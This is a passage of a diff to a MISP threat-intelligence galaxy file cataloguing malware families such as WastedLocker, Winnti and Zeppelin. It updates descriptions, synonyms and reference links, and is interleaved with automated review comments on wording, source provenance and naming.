+ "https://blog.trendmicro.co.jp/archives/28319",
+ "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/",
+ "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
+ "https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games"
+ ],
+ "synonyms": [
+ "VIGILANT CHECKER"
+ ],
+ "type": []
+ },
+ "uuid": "65711172-14f7-4e3d-9aca-7895b37b2e9a",
+ "value": "VIGILANT CLEANER"
+ },
 {
 "description": "",
 "meta": {
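Review bot: The new `VIGILANT CLEANER` description has a garbled clause, `In addition to targeting common file Office-related files`, which reads as a leftover from editing. A cleaner wording that keeps the same claim is `In addition to common Office-related file types, it specifically targets file types associated with the Japanese word processor Ichitaro.` The attribution to MBSD and the Olympics-targeting assumption are already hedged in the text, which is appropriate for a family whose only sources are the blog posts listed in `refs`.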
@@ -32154,6 +36585,20 @@
 "uuid": "a49d6db9-32a0-42a8-acb9-174146a7fafa",
 "value": "Vizom"
 },
+ {
+ "description": "VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm",
+ "https://bazaar.abuse.ch/browse/signature/Vjw0rm/",
+ "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3a8186f1-ff2a-4431-be99-7e31c0096f15",
+ "value": "Vjw0rm"
+ },
 {
 "description": "",
 "meta": {
@@ -32190,19 +36635,20 @@
 "value": "Vobfus"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.void",
- "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html",
+ "https://securelist.com/cis-ransomware/104452/"
 ],
 "synonyms": [
- "VoidCrypt Ransomware"
+ "VoidCrypt"
 ],
 "type": []
 },
 "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641",
- "value": "Void Ransomware"
+ "value": "Void"
 },
 {
 "description": "",
@@ -32271,6 +36717,19 @@
 "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
 "value": "vSkimmer"
 },
+ {
+ "description": "Information stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vulturi",
+ "https://twitter.com/ViriBack/status/1430604948241276928?s=20"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cfbd52a9-39d6-46f4-a539-76abcec92088",
+ "value": "Vulturi"
+ },
 {
 "description": "",
 "meta": {
@@ -32334,7 +36793,10 @@
 "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf",
 "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
 "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
+ "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
 "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
 "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
 "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
@@ -32355,7 +36817,7 @@
 "value": "WannaCryptor"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren",
@@ -32365,31 +36827,47 @@
 "type": []
 },
 "uuid": "44f548e2-9a47-433a-bccf-fff412d2963b",
- "value": "WannaRen Ransomware"
+ "value": "WannaRen"
 },
 {
 "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker",
- "https://securelist.com/wastedlocker-technical-analysis/97944/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
 "https://ioc.hatenablog.com/entry/2020/08/16/132853",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
+ "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://unit42.paloaltonetworks.com/wastedlocker/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
 "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
- "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
 "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
- "https://www.bbc.com/news/world-us-canada-53195749",
- "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf",
+ "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
+ "https://securelist.com/wastedlocker-technical-analysis/97944/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
 "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
 "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
+ "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.bbc.com/news/world-us-canada-53195749",
+ "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -32397,6 +36875,28 @@
 "uuid": "e72a0bde-ea5b-4450-bc90-b5d2dca697b4",
 "value": "WastedLocker"
 },
+ {
+ "description": "Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
+ "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
+ "https://daydaynews.cc/zh-tw/technology/297265.html",
+ "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf"
+ ],
+ "synonyms": [
+ "DbgPrint",
+ "EYEWELL"
+ ],
+ "type": []
+ },
+ "uuid": "042ddeed-78e4-4799-965a-3b6815145f28",
+ "value": "Waterbear"
+ },
 {
 "description": "",
 "meta": {
@@ -32611,23 +37111,40 @@
 "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4",
 "value": "WebMonitor RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wecontrol",
+ "https://unit42.paloaltonetworks.com/westeal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "541720a8-a125-4277-b109-c04e475c4cc3",
+ "value": "WeControl"
+ },
 {
 "description": "WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example \"gost\". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
 "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html",
 "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://community.riskiq.com/article/541a465f/description",
 "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
 "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html"
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -32635,6 +37152,19 @@
 "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
 "value": "WellMess"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.westeal",
+ "https://unit42.paloaltonetworks.com/westeal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8ec2d984-8c10-49f2-ad97-64af275a7afc",
+ "value": "WeSteal"
+ },
 {
 "description": "According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain \"working_hours\" with a granularity of one minute.",
 "meta": {
@@ -32695,14 +37225,20 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti",
 "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/",
+ "https://www.youtube.com/watch?v=_fstHQSK-kk",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
 "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf",
 "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
 "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/",
 "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html",
 "https://securelist.com/games-are-over/70991/",
 "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
 "https://github.com/TKCERT/winnti-suricata-lua",
+ "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
 "http://web.br.de/interaktiv/winnti/english/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
@@ -32719,13 +37255,17 @@
 "https://github.com/TKCERT/winnti-detector",
 "https://github.com/superkhung/winnti-sniff",
 "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
 "https://content.fireeye.com/api/pdfproxy?id=86840",
 "https://github.com/br-data/2019-winnti-analyse/",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://github.com/TKCERT/winnti-nmap-script",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf",
 "https://www.lastline.com/labsblog/helo-winnti-attack-scan/",
 "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf",
 "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage"
 ],
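Review bot: The new `docplayer.net` reference in the Winnti `refs` array appears to be a third-party re-upload of a conference paper rather than the publisher's copy, so its provenance and continued availability are weaker than the other sources in the list, and it does not identify the original venue. If the original PDF (or a web.archive.org capture of it, as used elsewhere in this diff for the Group-IB report) can be located, that URL should replace the docplayer link; otherwise the entry is still usable but worth flagging for a later source check.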
@@ -32775,11 +37315,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf"
+ ],
+ "synonyms": [
+ "Epic",
+ "Tavdig"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
@@ -32941,7 +37485,8 @@
 "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
 "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
 "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
 ],
 "synonyms": [
 "chopstick",
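Review bot: The new synonym `Epic` on the Wipbot cluster is a single generic word that, per the securelist reference added in the same hunk (`the-epic-turla-operation`), is also the name of the campaign, and galaxy synonyms are used for matching, so a bare `Epic` is likely to collide with an actor/campaign cluster or free-text tag rather than identify this malware family. Consider keeping only `Tavdig`, which is unambiguous, or spelling the campaign name out as `Epic Turla` if it must be kept. The swap of the two Symantec URLs at the top and bottom of the list is a pure reorder that adds nothing.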
@@ -32977,6 +37522,19 @@
 "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed",
 "value": "XBTL"
 },
+ {
+ "description": "Checkpoint Research found this backdoor, attributed to IndigoZebra, used to target Afghan and other Central-Asia countries, including Kyrgyzstan and Uzbekistan, since at least 2014.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xcaon",
+ "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2c150ebc-8fdf-4324-96cd-d6b0c0087d55",
+ "value": "xCaon"
+ },
 {
 "description": "According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.",
 "meta": {
@@ -32984,6 +37542,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy",
 "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf",
 "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://github.com/eset/malware-ioc/tree/master/xdspy/"
 ],
 "synonyms": [],
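Review bot: The new xCaon `description` misnames the vendor and uses the adjective where the country is meant: `Checkpoint Research` should be `Check Point Research` (matching the `research.checkpoint.com` ref) and `target Afghan and other Central-Asia countries` should read `target Afghanistan and other Central Asian countries`. Suggested line: `"description": "Check Point Research found this backdoor, attributed to IndigoZebra, used to target Afghanistan and other Central Asian countries, including Kyrgyzstan and Uzbekistan, since at least 2014."`. If the referenced report names a later variant of this backdoor separately, recording that name under `synonyms` (currently `[]`) would make the cluster match more of the reporting.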
@@ -33034,22 +37593,22 @@
 "value": "XFSCashNCR"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba",
 "https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html"
 ],
 "synonyms": [
- "FlyStudio Ransomware"
+ "FlyStudio"
 ],
 "type": []
 },
 "uuid": "e839ae61-616c-4234-8edb-36b48040e5af",
- "value": "XiaoBa Ransomware"
+ "value": "XiaoBa"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10",
@@ -33061,7 +37620,7 @@
 "type": []
 },
 "uuid": "6aa7047f-7dfa-4a10-b515-853c3795db69",
- "value": "XP10 Ransomware"
+ "value": "XP10"
 },
 {
 "description": "",
@@ -33099,6 +37658,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
 "https://labs.k7computing.com/?p=15672",
 "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration"
 ],
@@ -33245,7 +37805,7 @@
 "value": "Yahoyah"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware",
@@ -33257,7 +37817,7 @@
 "type": []
 },
 "uuid": "0308eff9-1e8c-434e-b551-40f0ceb7dc0e",
- "value": "Yakuza Ransomware"
+ "value": "Yakuza"
 },
 {
 "description": "Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.",
@@ -33271,7 +37831,7 @@
 "type": []
 },
 "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6",
- "value": "Yarraq Ransomware"
+ "value": "Yarraq"
 },
 {
 "description": "",
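Review bot: Renaming the cluster `value` from `XiaoBa Ransomware` to `XiaoBa` (and likewise XP10, Yakuza and Yarraq in the following hunks) changes the string that existing MISP events carry as a galaxy tag, and the old name is not kept anywhere in the entry, so those tags will no longer resolve to this cluster wherever matching is done by value/synonym rather than by the unchanged UUID. Keep the old names as synonyms, e.g. `"synonyms": [ "FlyStudio", "XiaoBa Ransomware" ]`. Shortening `FlyStudio Ransomware` to a bare `FlyStudio` is also questionable: as far as I know FlyStudio is the Chinese development environment the sample was built with, not a family name, so the bare word will match anything written in it.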
@@ -33363,7 +37923,7 @@
 "value": "yty"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.z3",
@@ -33375,7 +37935,7 @@
 "type": []
 },
 "uuid": "3eb96cd0-2d00-45a8-a0a4-54663cc70ab9",
- "value": "Z3 Ransomware"
+ "value": "Z3"
 },
 {
 "description": "Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.",
@@ -33398,22 +37958,24 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
 "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
 "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
 "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
 "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
 "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
+ "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
 "https://research.checkpoint.com/malware-against-the-c-monoculture/",
 "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
 "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
 "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
 "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
- "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
- "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
 "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
 "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
 "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
@@ -33458,6 +38020,19 @@
 "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa",
 "value": "Zedhou"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar",
+ "https://twitter.com/3xp0rtblog/status/1387996083712888832?s=20"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7502f293-0b7f-417f-a13a-1c71dadc5ccc",
+ "value": "zenar"
+ },
 {
 "description": "",
 "meta": {
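Review bot: The added `https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries` reference is the root of a repository covering many families, so it does not tell a reader which query concerns Zebrocy and will silently point at nothing relevant once the repository is reorganised; link the specific query file via a `/blob/<commit>/...` path pinned to a commit instead. The rest of the hunk only moves the two vkremez links and the securelist APT-trends link to new positions without changing them, which is reorder noise that hides the one real addition.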
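Review bot: The only non-Malpedia reference for the new `zenar` cluster is a single tweet, cited with the `?s=20` share-tracking parameter, and the `description` is empty, so the entry gives consumers nothing to verify the family against. Drop the tracking parameter (`"https://twitter.com/3xp0rtblog/status/1387996083712888832"`), add a pinned `web.archive.org` snapshot of the tweet next to it since tweets disappear, and give the cluster at least a one-line description of what zenar is, as the neighbouring entries do.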
@@ -33475,18 +38050,20 @@
 "description": "Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin_ransomware",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf",
+ "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
- "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html"
+ "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
 ],
 "synonyms": [],
 "type": []
 },
